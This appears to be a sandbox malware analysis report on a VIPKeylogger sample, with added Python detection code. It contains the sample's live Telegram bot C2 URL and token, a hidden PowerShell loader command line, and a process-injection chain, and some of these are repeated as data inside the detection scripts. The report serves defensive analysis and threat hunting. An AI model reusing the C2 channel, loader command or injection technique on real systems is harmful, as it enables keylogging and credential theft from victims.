Analysis
max time kernel: 120s
max time network: 124s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 29/08/2024, 11:15

Static task: static1
Behavioral task: behavioral1
Sample: Nettably.exe
Resource: win7-20240704-en
General
Target: Nettably.exe
Size: 698KB
MD5: 0815e4fcd9b75660891ec15ce119fa70
SHA1: 7f8c1c73194725dce424b72ff2306203f3590c3b
SHA256: 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b
SHA512: c613b96c177294bbbfce2e0b86d15f32d2c7c579bf4c50ef0940ae697e7cfa0f36512ff7fa221c2a5b6963ca6b000b34876707bdc56351c20d20a3ee54fa68ba
SSDEEP: 12288:67MJHZFQpHB5LOBTCUbINBoQYwXsCGJt5aFp0zS6w+CAG0snsQc:6IJHoph5CBTCUUN6QYwZrH6VfAsQc
Malware Config
Extracted:
  Family: vipkeylogger
  C2: https://api.telegram.org/bot7480851360:AAFGFIgeYioB7dUKsMFuCrt400Zxu2IugeM/sendMessage?chat_id=6070006284
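The extracted C2 is a Telegram Bot API `sendMessage` endpoint, so the two handles a responder needs are the bot token (the `bot<id>:<secret>` path segment) and the `chat_id` that receives the stolen data. As an added example that is not part of the Triage report, the following Python pulls those out of the URL above and then hunts proxy logs for the same exfiltration pattern together with the `checkip.dyndns.org` lookup seen in the network signatures. It deliberately matches any Telegram bot-API call rather than only this token, since an operator can rotate the bot. The proxy log lines and their field layout (timestamp, client, method, URL, status) are constructed for this example; only the C2 URL comes from the report.

```python
"""Added example (not part of the Triage report): parse the VIPKeylogger
Telegram C2 URL and hunt proxy logs for bot-API exfiltration.
The log lines and their layout are constructed; the C2 URL is from the report."""
import re
from urllib.parse import urlsplit, parse_qs

# C2 URL as extracted by the sandbox from the sample's configuration.
C2_URL = ("https://api.telegram.org/bot7480851360:AAFGFIgeYioB7dUKsMFuCrt400Zxu2IugeM"
          "/sendMessage?chat_id=6070006284")

# Bot-API paths look like /bot<numeric bot id>:<secret>/<method>.
TOKEN_RE = re.compile(r"/bot(\d+):([A-Za-z0-9_-]{30,})/(\w+)")

# Constructed proxy log lines: "<timestamp> <client> <method> <url> <status>".
LOG_LINES = [
    "2024-08-29T11:16:02Z 10.0.0.5 GET http://checkip.dyndns.org/ 200",
    "2024-08-29T11:16:03Z 10.0.0.5 GET https://drive.google.com/uc?export=download&id=EXAMPLE 200",
    "2024-08-29T11:16:09Z 10.0.0.5 GET " + C2_URL + " 200",
    "2024-08-29T11:17:40Z 10.0.0.7 GET https://www.example.com/index.html 200",
]


def parse_telegram_c2(url):
    """Return bot id, full token, API method and chat_id for a Telegram
    bot-API URL, or None if the URL is not one."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        return None
    m = TOKEN_RE.search(parts.path)
    if not m:
        return None
    bot_id, secret, method = m.groups()
    chat_id = parse_qs(parts.query).get("chat_id", [None])[0]
    return {"bot_id": bot_id, "token": f"{bot_id}:{secret}",
            "method": method, "chat_id": chat_id}


def hunt_exfil(lines):
    """Group indicators per client. Any bot-API call from an endpoint is
    suspicious (normal Telegram clients do not use the bot API), and the
    external-IP lookup is the sample's own pre-exfiltration step."""
    findings = {}
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[3]
        host = urlsplit(url).hostname or ""
        hits = findings.setdefault(client, [])
        tg = parse_telegram_c2(url)
        if tg:
            hits.append(("telegram_bot_api", tg["bot_id"], tg["chat_id"]))
        elif host == "checkip.dyndns.org":
            hits.append(("external_ip_lookup", host, None))
    return {client: hits for client, hits in findings.items() if hits}


if __name__ == "__main__":
    print(parse_telegram_c2(C2_URL))
    for client, hits in hunt_exfil(LOG_LINES).items():
        print(client, hits)
```

The numeric bot id is the stable half of the token; the secret after the colon is what an operator rotates, so hunting on the `/bot<id>:` path shape rather than on the full token string survives that rotation. The drive.google.com hit is left out of the findings on purpose: the report shows it used for hosting, but on its own it is too common to alert on.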
Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was found in 2020.
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell with its display window hidden.
  PID 2548  powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 3   drive.google.com
  flow 4   drive.google.com

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 14  checkip.dyndns.org

Drops file in System32 directory (1 IoC)
  File opened for modification  C:\Windows\SysWOW64\legionrernes.Bac  Nettably.exe

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  PID 2472  ImagingDevices.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  PID 2548  powershell.exe
  PID 2472  ImagingDevices.exe

Suspicious use of SetThreadContext (1 IoC)
  PID 2548 (powershell.exe) set thread context of PID 2472  (procid_target 33)

Drops file in Program Files directory (1 IoC)
  File opened for modification  C:\Program Files (x86)\Common Files\underskridelser.ini  Nettably.exe

Drops file in Windows directory (1 IoC)
  File opened for modification  C:\Windows\Fonts\battable.ini  Nettably.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Nettably.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ImagingDevices.exe
Suspicious behavior: EnumeratesProcesses (7 IoCs)
  PID 2548  powershell.exe  (6 entries)
  PID 2472  ImagingDevices.exe

Suspicious behavior: MapViewOfSection (1 IoC)
  PID 2548  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege  PID 2548  powershell.exe
  Token: SeDebugPrivilege  PID 2472  ImagingDevices.exe

Suspicious use of WriteProcessMemory (10 IoCs)
  PID 2116 (Nettably.exe) wrote to memory of PID 2548  (procid_target 30, 4 entries)
  PID 2548 (powershell.exe) wrote to memory of PID 2472  (procid_target 33, 6 entries)
Processes

C:\Users\Admin\AppData\Local\Temp\Nettably.exe  (PID 2116)
  "C:\Users\Admin\AppData\Local\Temp\Nettably.exe"
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2548, child of 2116)
    "powershell.exe" -windowstyle hidden "$Kludgy=Get-Content 'C:\Users\Admin\AppData\Local\errancies\Tansies.Tem';$Crushes53=$Kludgy.SubString(52844,3);.$Crushes53($Kludgy)
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe  (PID 2472, child of 2548)
      "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
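The process tree is where this chain is cheapest to detect: a freshly dropped executable in Temp starts a hidden PowerShell, that PowerShell reads a staging file (Tansies.Tem), slices three characters out of it at a fixed offset and dot-invokes the slice as a command with the whole blob as its argument (the slice is consistent with an invocation alias such as `iex`, but the report does not show the file's contents, so that reading is an assumption), and the same PowerShell then starts ImagingDevices.exe with no arguments, the process whose thread context it sets and whose memory it writes. As an added example that is not part of the Triage report, the following Python runs that logic over Sysmon-style process-creation events. The three command lines are copied from the tree above; the event layout, the benign contrast event and the PIDs 900, 1200 and 3001 are constructed.

```python
"""Added example (not part of the Triage report): detection logic for the
VIPKeylogger loader chain over Sysmon-style process-creation events.
Command lines are from the report; the Event layout, the benign contrast
event and PIDs 900/1200/3001 are constructed for the example."""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

EVENTS = [
    Event(2116, 1200, r"C:\Users\Admin\AppData\Local\Temp\Nettably.exe",
          r'"C:\Users\Admin\AppData\Local\Temp\Nettably.exe"'),
    Event(2548, 2116, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
          r'"powershell.exe" -windowstyle hidden "$Kludgy=Get-Content '
          r"'C:\Users\Admin\AppData\Local\errancies\Tansies.Tem';"
          r'$Crushes53=$Kludgy.SubString(52844,3);.$Crushes53($Kludgy)'),
    Event(2472, 2548, r"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe",
          r'"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"'),
    # Constructed benign contrast: an interactive admin running a cmdlet.
    Event(3001, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r'"powershell.exe" -NoProfile -Command Get-Service'),
]

# -windowstyle hidden and its abbreviations (-w h, -win hidden, ...).
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)

# The slice loader: read a file, take SubString(offset, length) of it,
# then dot- or &-invoke that slice as a command name. The slice content
# is assumed to be an invocation alias; the report does not show it.
SLICE_LOADER_RE = re.compile(
    r"Get-Content\s+'(?P<path>[^']+)'"                  # staging blob on disk
    r".*?\.SubString\((?P<off>\d+),\s*(?P<len>\d+)\)"   # slice pulled from it
    r".*?[.&]\s*\$\w+\s*\(",                            # slice used as the command
    re.I | re.S)


def _name(image):
    return image.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return a list of findings; each has a 'rule' and the offending 'pid'."""
    by_pid = {e.pid: e for e in events}
    findings, loader_pids = [], set()
    for e in events:
        if _name(e.image) != "powershell.exe":
            continue
        m = SLICE_LOADER_RE.search(e.cmdline)
        if m:
            loader_pids.add(e.pid)
            findings.append({
                "rule": "powershell_slice_loader", "pid": e.pid,
                "stage_file": m.group("path"),          # what to pull from disk
                "offset": int(m.group("off")), "length": int(m.group("len")),
                "hidden_window": bool(HIDDEN_RE.search(e.cmdline)),
            })
        parent = by_pid.get(e.ppid)
        if parent and "\\appdata\\local\\temp\\" in parent.image.lower():
            findings.append({"rule": "temp_binary_spawns_powershell",
                             "pid": e.pid, "parent": parent.image})
    # A second pass so children of a loader are caught regardless of event order:
    # a program started with no arguments by the loader is the likely target of
    # the SetThreadContext / WriteProcessMemory activity in the signatures.
    for e in events:
        if e.ppid in loader_pids and e.cmdline.strip('"') == e.image:
            findings.append({"rule": "loader_spawns_empty_host",
                             "pid": e.pid, "image": e.image})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f)
```

The loader finding carries the staging file path and the slice offset and length so the responder knows exactly which bytes of Tansies.Tem to read before detonating anything; if the three characters at offset 52844 are an invocation alias, replacing the dot-invoke with a write-to-file turns the loader into its own decoder. The benign `-NoProfile -Command Get-Service` event produces no finding, which is the property the rules need before they go into a SIEM.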
Network
MITRE ATT&CK Enterprise v15
Downloads

Download 1
  Filesize: 51KB
  MD5: 5d38b5b5dd9df5889a8cdae91bda8ce0
  SHA1: 55d4f7428bfc7a1c572e2f65d2877f53dfe9b00c
  SHA256: 45c83c93a697679fb2f35ba68b3df5393398970f0adbda0f8af697080a661a07
  SHA512: 9632d65d07e63235746f60133dfeaad9474db92a70d2264300d3f433399b0ca0e647120d3393d07e5f722597ec1e14a4111f9b0819886cb11f646d75c1e6be8d

Download 2
  Filesize: 315KB
  MD5: 657f4fbdce2aec00af95560a9bb2f05f
  SHA1: 05d405cdf1e9b5617ff83d7833d7eb4f011a017b
  SHA256: dc6ea094e7cd8bb7306cb687eb37b1e8c711ea58c626628cd3c70dc329bdde6d
  SHA512: 9f77c539e9e76a3b9f3b77f5e7a771b23881daefd267cce693e77d40b0cb9a0cfb0371c61d9e5395af20d5395c5b0cc886828099ea136f35b87ef9f6ba638b38